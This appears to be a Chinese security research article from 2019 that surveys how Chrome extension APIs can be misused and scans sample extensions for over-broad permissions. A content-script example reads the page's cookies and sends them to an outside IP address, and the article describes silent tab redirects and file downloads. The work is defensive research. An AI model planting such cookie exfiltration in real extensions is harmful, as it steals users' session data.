作者:LoRexxar'@知道創宇404實驗室
時間:2019年12月5日
English version: http://www.bjnorthway.com/1095/
在2019年初,微軟正式選擇了Chromium作為默認瀏覽器,并放棄edge的發展。并在19年4月8日,Edge正式放出了基于Chromium開發的Edge Dev瀏覽器,并提供了兼容Chrome Ext的配套插件管理。再加上國內的大小國產瀏覽器大多都是基于Chromium開發的,Chrome的插件體系越來越影響著廣大的人群。
在這種背景下,Chrome Ext的安全問題也應該受到應有的關注,《從0開始入門Chrome Ext安全》就會從最基礎的插件開發開始,逐步研究插件本身的惡意安全問題,惡意網頁如何利用插件漏洞攻擊瀏覽器等各種視角下的安全問題。
上篇我們主要聊了關于最基礎插件開發,之后我們就要探討關于Chrome Ext的安全性問題了,這篇文章我們主要圍繞Chrome Ext的api開始,探討在插件層面到底能對瀏覽器進行多少種操作。
從一個測試頁面開始
為了探討插件的功能權限范圍,首先我們設置一個簡單的頁面
<?php
setcookie('secret_cookie', 'secret_cookie', time()+3600*24);
?>
test pages接下來我們將圍繞Chrome ext api的功能探討各種可能存在的安全問題以及攻擊層面。
Chrome ext js
content-script
content-script是插件的核心功能代碼地方,一般來說,主要的js代碼都會出現在content-script中。
它的引入方式在上一篇文章中提到過,要在manfest.json中設置
"content_scripts": [
{
"matches": ["http://*.nytimes.com/*"],
"css": ["myStyles.css"],
"js": ["contentScript.js"]
}
],而content_script js 主要的特點在于他與頁面同時加載,可以訪問dom,并且也能調用extension、runtime等部分api,但并不多,主要用于和頁面的交互。
content_script js可以通過設置run_at來設置相對應腳本加載的時機。
- document_idle 為默認值,一般來說會在頁面dom加載完成之后,window.onload事件觸發之前
- document_start 為css加載之后,構造頁面dom之前
- document_end 則為dom完成之后,圖片等資源加載之前
并且,content_script js還允許通過設置all_frames來使得content_script js作用于頁面內的所有frame,這個配置默認為關閉,因為這本身是個不安全的配置,這個問題會在后面提到。
在content_script js中可以直接訪問以下Chrome Ext api:
- i18n
- storage
- runtime:
- connect
- getManifest
- getURL
- id
- onConnect
- onMessage
- sendMessage
在了解完基本的配置后,我們就來看看content_script js可以對頁面造成什么樣的安全問題。
安全問題
對于content_script js來說,首當其中的一個問題就是,插件可以獲取頁面的dom,換言之,插件可以操作頁面內的所有dom,其中就包括非httponly的cookie.
這里我們簡單把content_script js中寫入下面的代碼
console.log(document.cookie);
console.log(document.documentElement.outerHTML);
var xhr = new XMLHttpRequest();
xhr.open("get", "http://212.129.137.248?a="+document.cookie, false);
xhr.send()然后加載插件之后刷新頁面
可以看到成功獲取到了頁面內dom的信息,并且如果我們通過xhr跨域傳出消息之后,我們在后臺也成功收到了這個請求。
這也就意味著,如果插件作者在插件中惡意修改dom,甚至獲取dom值傳出都可以通過瀏覽器使用者無感的方式進行。
在整個瀏覽器的插件體系內,各個層面都存在著這個問題,其中content_script js、injected script js和devtools js都可以直接訪問操作dom,而popup js和background js都可以通過chrome.tabs.executeScript來動態執行js,同樣可以執行js修改dom。
除了前面的問題以外,事實上content_script js能訪問到的chrome api非常之少,也涉及不到什么安全性,這里暫且不提。
popup/background js
popup js和backround js兩個主要的區別在于加載的時機,由于他們不能訪問dom,所以這兩部分的js在瀏覽器中主要依靠事件驅動。
其中的主要區別是,background js在事件觸發之后會持續執行,而且在關閉所有可見視圖和端口之前不會結束。值得注意的是,頁面打開、點擊拓展按鈕都連接著相應的事件,而不會直接影響插件的加載。
而除此之外,這兩部分js最重要的特性在于,他們可以調用大部分的chrome ext api,在后面我們將一起探索一下各種api。
devtools js
devtools js在插件體系中是一個比較特別的體系,如果我們一般把F12叫做開發者工具的話,那devtools js就是開發者工具的開發者工具。
權限和域限制大體上和content js 一致,而唯一特別的是他可以操作3個特殊的api:
- chrome.devtools.panels:面板相關;
- chrome.devtools.inspectedWindow:獲取被審查窗口的有關信息;
- chrome.devtools.network:獲取有關網絡請求的信息;
而這三個api也主要是用于修改F12和獲取信息的,其他的就不贅述了。
Chrome Ext Api
chrome.cookies
chrome.cookies api需要給與域權限以及cookies權限,在manfest.json中這樣定義:
{
"name": "My extension",
...
"permissions": [
"cookies",
"*://*.google.com"
],
...
}當申請這樣的權限之后,我們可以通過調用chrome.cookies去獲取google.com域下的所有cookie.
其中一共包含5個方法
-
get - chrome.cookies.get(object details, function callback)
獲取符合條件的cookie -
getAll - chrome.cookies.getAll(object details, function callback)
獲取符合條件的所有cookie -
set - chrome.cookies.set(object details, function callback)
設置cookie -
remove - chrome.cookies.remove(object details, function callback)
刪除cookie -
getAllCookieStores - chrome.cookies.getAllCookieStores(function callback)
列出所有儲存的cookie
和一個事件
- chrome.cookies.onChanged.addListener(function callback)
當cookie刪除或者更改導致的事件
當插件擁有cookie權限時,他們可以讀寫所有瀏覽器存儲的cookie.
chrome.contentSettings
chrome.contentSettings api 用來設置瀏覽器在訪問某個網頁時的基礎設置,其中包括cookie、js、插件等很多在訪問網頁時生效的配置。
在manifest中需要申請contentSettings的權限
{
"name": "My extension",
...
"permissions": [
"contentSettings"
],
...
}在content.Setting的api中,方法主要用于修改設置
- ResourceIdentifier
- Scope
- ContentSetting
- CookiesContentSetting
- ImagesContentSetting
- JavascriptContentSetting
- LocationContentSetting
- PluginsContentSetting
- PopupsContentSetting
- NotificationsContentSetting
- FullscreenContentSetting
- MouselockContentSetting
- MicrophoneContentSetting
- CameraContentSetting
- PpapiBrokerContentSetting
- MultipleAutomaticDownloadsContentSetting因為沒有涉及到太重要的api,這里就暫時不提
chrome.desktopCapture
chrome.desktopCapture可以被用來對整個屏幕,瀏覽器或者某個頁面截圖(實時)。
在manifest中需要申請desktopCapture的權限,并且瀏覽器提供了獲取媒體流的一個方法。
- chooseDesktopMedia - integer chrome.desktopCapture.chooseDesktopMedia(array of DesktopCaptureSourceType sources, tabs.Tab targetTab, function callback)
- cancelChooseDesktopMedia - chrome.desktopCapture.cancelChooseDesktopMedia(integer desktopMediaRequestId)
其中DesktopCaptureSourceType被設置為"screen", "window", "tab", or "audio"的列表。
獲取到相應截圖之后,該方法會將相對應的媒體流id傳給回調函數,這個id可以通過getUserMedia這個api來生成相應的id,這個新創建的streamid只能使用一次并且會在幾秒后過期。
這里用一個簡單的demo來示范
function gotStream(stream) {
console.log("Received local stream");
var video = document.querySelector("video");
video.src = URL.createObjectURL(stream);
localstream = stream;
stream.onended = function() { console.log("Ended"); };
}
chrome.desktopCapture.chooseDesktopMedia(
["screen"], function (id) {
navigator.webkitGetUserMedia({
audio: false,
video: {
mandatory: {
chromeMediaSource: "desktop",
chromeMediaSourceId: id
}
}
}, gotStream);
}
});這里獲取的是一個實時的視頻流
chrome.pageCapture
chrome.pageCapture的大致邏輯和desktopCapture比較像,在manifest需要申請pageCapture的權限
{
"name": "My extension",
...
"permissions": [
"pageCapture"
],
...
}它也只支持saveasMHTML一種方法
- saveAsMHTML - chrome.pageCapture.saveAsMHTML(object details, function callback)
通過調用這個方法可以獲取當前瀏覽器任意tab下的頁面源碼,并保存為blob格式的對象。
唯一的問題在于需要先知道tabid
chrome.tabCapture
chrome.tabCapture和chrome.desktopCapture類似,其主要功能區別在于,tabCapture可以捕獲標簽頁的視頻和音頻,比desktopCapture來說要更加針對。
同樣的需要提前聲明tabCapture權限。
主要方法有
- capture - chrome.tabCapture.capture( CaptureOptions options, function callback)
- getCapturedTabs - chrome.tabCapture.getCapturedTabs(function callback)
- captureOffscreenTab - chrome.tabCapture.captureOffscreenTab(string startUrl, CaptureOptions options, function callback)
- getMediaStreamId - chrome.tabCapture.getMediaStreamId(object options, function callback)
這里就不細講了,大部分api都是用來捕獲媒體流的,進一步使用就和desktopCapture中提到的使用方法相差不大。
chrome.webRequest
chrome.webRequest主要用戶觀察和分析流量,并且允許在運行過程中攔截、阻止或修改請求。
在manifest中這個api除了需要webRequest以外,還有有相應域的權限,比如*://*.*:*,而且要注意的是如果是需要攔截請求還需要webRequestBlocking的權限
{
"name": "My extension",
...
"permissions": [
"webRequest",
"*://*.google.com/"
],
...
}在具體了解這個api之前,首先我們必須了解一次請求在瀏覽器層面的流程,以及相應的事件觸發。
在瀏覽器插件的世界里,相應的事件觸發被劃分為多個層級,每個層級逐一執行處理。
由于這個api下的接口太多,這里拿其中的一個舉例子
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
return {cancel: details.url.indexOf("://www.baidu.com/") != -1};
},
{urls: ["<all_urls>"]},
["blocking"]);當訪問baidu的時候,請求會被block
當設置了redirectUrl時會產生相應的跳轉
chrome.webRequest.onBeforeRequest.addListener(
function(details) {
if(details.url.indexOf("://www.baidu.com/") != -1){
return {redirectUrl: "https://lorexxar.cn"};
}
},
{urls: ["<all_urls>"]},
["blocking"]);此時訪問www.baidu.com會跳轉lorexxar.cn
在文檔中提到,通過這些api可以直接修改post提交的內容。
chrome.bookmarks
chrome.bookmarks是用來操作chrome收藏夾欄的api,可以用于獲取、修改、創建收藏夾內容。
在manifest中需要申請bookmarks權限。
當我們使用這個api時,不但可以獲取所有的收藏列表,還可以靜默修改收藏對應的鏈接。
chrome.downloads
chrome.downloads是用來操作chrome中下載文件相關的api,可以創建下載,繼續、取消、暫停,甚至可以打開下載文件的目錄或打開下載的文件。
這個api在manifest中需要申請downloads權限,如果想要打開下載的文件,還需要申請downloads.open權限。
{
"name": "My extension",
...
"permissions": [
"downloads",
"downloads.open"
],
...
}在這個api下,提供了許多相關的方法
- download - chrome.downloads.download(object options, function callback)
- search - chrome.downloads.search(object query, function callback)
- pause - chrome.downloads.pause(integer downloadId, function callback)
- resume - chrome.downloads.resume(integer downloadId, function callback)
- cancel - chrome.downloads.cancel(integer downloadId, function callback)
- getFileIcon - chrome.downloads.getFileIcon(integer downloadId, object options, function callback)
- open - chrome.downloads.open(integer downloadId)
- show - chrome.downloads.show(integer downloadId)
- showDefaultFolder - chrome.downloads.showDefaultFolder()
- erase - chrome.downloads.erase(object query, function callback)
- removeFile - chrome.downloads.removeFile(integer downloadId, function callback)
- acceptDanger - chrome.downloads.acceptDanger(integer downloadId, function callback)
- setShelfEnabled - chrome.downloads.setShelfEnabled(boolean enabled)
當我們擁有相應的權限時,我們可以直接創建新的下載,如果是危險后綴,比如.exe等會彈出一個相應的危險提示。
除了在下載過程中可以暫停、取消等方法,還可以通過show打開文件所在目錄或者open直接打開文件。
但除了需要額外的open權限以外,還會彈出一次提示框。
相應的其實可以下載file:///C:/Windows/System32/calc.exe并執行,只不過在下載和執行的時候會有專門的危險提示。
反之來說,如果我們下載的是一個標識為非危險的文件,那么我們就可以靜默下載并且打開文件。
chrome.history && chrome.sessions
chrome.history 是用來操作歷史紀錄的api,和我們常見的瀏覽器歷史記錄的區別就是,這個api只能獲取這次打開瀏覽器中的歷史紀律,而且要注意的是,只有關閉的網站才會算進歷史記錄中。
這個api在manfiest中要申請history權限。
{
"name": "My extension",
...
"permissions": [
"history"
],
...
}api下的所有方法如下,主要圍繞增刪改查來
- search - chrome.history.search(object query, function callback)
- getVisits - chrome.history.getVisits(object details, function callback)
- addUrl - chrome.history.addUrl(object details, function callback)
- deleteUrl - chrome.history.deleteUrl(object details, function callback)
- deleteRange - chrome.history.deleteRange(object range, function callback)
- deleteAll - chrome.history.deleteAll(function callback)
瀏覽器可以獲取這次打開瀏覽器之后所有的歷史紀錄。
在chrome的api中,有一個api和這個類似-chrome.sessions
這個api是用來操作和回復瀏覽器會話的,同樣需要申請sessions權限。
- getRecentlyClosed - chrome.sessions.getRecentlyClosed( Filter filter, function callback)
- getDevices - chrome.sessions.getDevices( Filter filter, function callback)
- restore - chrome.sessions.restore(string sessionId, function callback)
通過這個api可以獲取最近關閉的標簽會話,還可以恢復。
chrome.tabs
chrome.tabs是用于操作標簽頁的api,算是所有api中比較重要的一個api,其中有很多特殊的操作,除了可以控制標簽頁以外,也可以在標簽頁內執行js,改變css。
無需聲明任何權限就可以調用tabs中的大多出api,但是如果需要修改tab的url等屬性,則需要tabs權限,除此之外,想要在tab中執行js和修改css,還需要activeTab權限才行。
- get - chrome.tabs.get(integer tabId, function callback)
- getCurrent - chrome.tabs.getCurrent(function callback)
- connect - runtime.Port chrome.tabs.connect(integer tabId, object connectInfo)
- sendRequest - chrome.tabs.sendRequest(integer tabId, any request, function responseCallback)
- sendMessage - chrome.tabs.sendMessage(integer tabId, any message, object options, function responseCallback)
- getSelected - chrome.tabs.getSelected(integer windowId, function callback)
- getAllInWindow - chrome.tabs.getAllInWindow(integer windowId, function callback)
- create - chrome.tabs.create(object createProperties, function callback)
- duplicate - chrome.tabs.duplicate(integer tabId, function callback)
- query - chrome.tabs.query(object queryInfo, function callback)
- highlight - chrome.tabs.highlight(object highlightInfo, function callback)
- update - chrome.tabs.update(integer tabId, object updateProperties, function callback)
- move - chrome.tabs.move(integer or array of integer tabIds, object - moveProperties, function callback)
- reload - chrome.tabs.reload(integer tabId, object reloadProperties, function callback)
- remove - chrome.tabs.remove(integer or array of integer tabIds, function callback)
- detectLanguage - chrome.tabs.detectLanguage(integer tabId, function callback)
- captureVisibleTab - chrome.tabs.captureVisibleTab(integer windowId, object options, function callback)
- executeScript - chrome.tabs.executeScript(integer tabId, object details, function callback)
- insertCSS - chrome.tabs.insertCSS(integer tabId, object details, function callback)
- setZoom - chrome.tabs.setZoom(integer tabId, double zoomFactor, function callback)
- getZoom - chrome.tabs.getZoom(integer tabId, function callback)
- setZoomSettings - chrome.tabs.setZoomSettings(integer tabId, ZoomSettings zoomSettings, function callback)
- getZoomSettings - chrome.tabs.getZoomSettings(integer tabId, function callback)
- discard - chrome.tabs.discard(integer tabId, function callback)
- goForward - chrome.tabs.goForward(integer tabId, function callback)
- goBack - chrome.tabs.goBack(integer tabId, function callback)
一個比較簡單的例子,如果獲取到tab,我們可以通過update靜默跳轉tab。
同樣的,除了可以控制任意tab的鏈接以外,我們還可以新建、移動、復制,高亮標簽頁。
當我們擁有activeTab權限時,我們還可以使用captureVisibleTab來截取當前頁面,并轉化為data數據流。
同樣我們可以用executeScript來執行js代碼,這也是popup和當前頁面一般溝通的主要方式。
這里我主要整理了一些和敏感信息相關的API,對于插件的安全問題討論也將主要圍繞這些API來討論。
chrome 插件權限體系
在了解基本的API之后,我們必須了解一下chrome 插件的權限體系,在跟著閱讀前面相關api的部分之后,不難發現,chrome其實對自身的插件體系又非常嚴格的分割,但也許正是因為這樣,對于插件開發者來說,可能需要申請太多的權限用于插件。
所以為了省事,chrome還給出了第二種權限聲明方式,就是基于域的權限體系。
在權限申請中,可以申請諸如:
"http://*/*","https://*/*""*://*/*","http://*/","https://*/",
這樣針對具體域的權限申請方式,還支持<all_urls>直接替代所有。
在后來的權限體系中,Chrome新增了activeTab來替代<all_urls>,在聲明了activeTab之后,瀏覽器會賦予插件操作當前活躍選項卡的操作權限,且不會聲明具體的權限要求。
-
當沒有activeTab
-
當申請activeTab后
當activeTab權限被聲明之后,無需任何其他權限就可以執行以下操作:
- 調用tabs.executeScript 和 tabs.insertCSS
- 通過tabs.Tab對象獲取頁面的各種信息
- 獲取webRequest需要的域權限
換言之,當插件申請到activeTab權限時,哪怕獲取不到瀏覽器信息,也能任意操作瀏覽的標簽頁。
更何況,對于大多數插件使用者,他們根本不關心插件申請了什么權限,所以插件開發者即便申請需要權限也不會影響使用,在這種理念下,安全問題就誕生了。
真實世界中的數據
經過粗略統計,現在公開在chrome商店的chrome ext超過40000,還不包括私下傳播的瀏覽器插件。
為了能夠盡量真實的反映真實世界中的影響,這里我們隨機選取1200個chrome插件,并從這部分的插件中獲取一些結果。值得注意的是,下面提到的權限并不一定代表插件不安全,只是當插件獲取這樣的權限時,它就有能力完成不安 全的操作。
這里我們使用Cobra-W新增的Chrome ext掃描功能對我們選取的1200個目標進行掃描分析。
https://github.com/LoRexxar/Cobra-W
python3 cobra.py -t '..\chrome_target\' -r 4104 -lan chromeext -d<all-url>
當插件獲取到<all-url>或者*://*/*等類似的權限之后,插件可以操作所有打開的標簽頁,可以靜默執行任意js、css代碼。
我們可以用以下規則來掃描:
class CVI_4104:
"""
rule for chrome crx
"""
def __init__(self):
self.svid = 4104
self.language = "chromeext"
self.author = "LoRexxar"
self.vulnerability = "Manifest.json permissions 要求權限過大"
self.description = "Manifest.json permissions 要求權限過大"
# status
self.status = True
# 部分配置
self.match_mode = "special-crx-keyword-match"
self.keyword = "permissions"
self.match = [
"http://*/*",
"https://*/*",
"*://*/*",
"<all_urls>",
"http://*/",
"https://*/",
"activeTab",
]
self.match = list(map(re.escape, self.match))
self.unmatch = []
self.vul_function = None
def main(self, regex_string):
"""
regex string input
:regex_string: regex match string
:return:
"""
pass在我們隨機挑選的1200個插件中,共585個插件申請了相關的權限。
其中大部分插件都申請了相對范圍較廣的覆蓋范圍。
其他
然后我們主要掃描部分在前面提到過的敏感api權限,涉及到相關的權限的插件數量如下:
后記
在翻閱了chrome相關的文檔之后,我們不難發現,作為瀏覽器中相對獨立的一層,插件可以輕松的操作相對下層的會話層,同時也可以在獲取一定的權限之后,讀取一些更上層例如操作系統的信息...
而且最麻煩的是,現代在使用瀏覽器的同時,很少會在意瀏覽器插件的安全性,而事實上,chrome商店也只能在一定程度上檢測插件的安全性,但是卻沒辦法完全驗證,換言之,如果你安裝了一個惡意插件,也沒有任何人能為你的瀏覽器負責...安全問題也就真實的影響著各個瀏覽器的使用者。
ref
本文由 Seebug Paper 發布,如需轉載請注明來源。本文地址:http://www.bjnorthway.com/1092/
暫無評論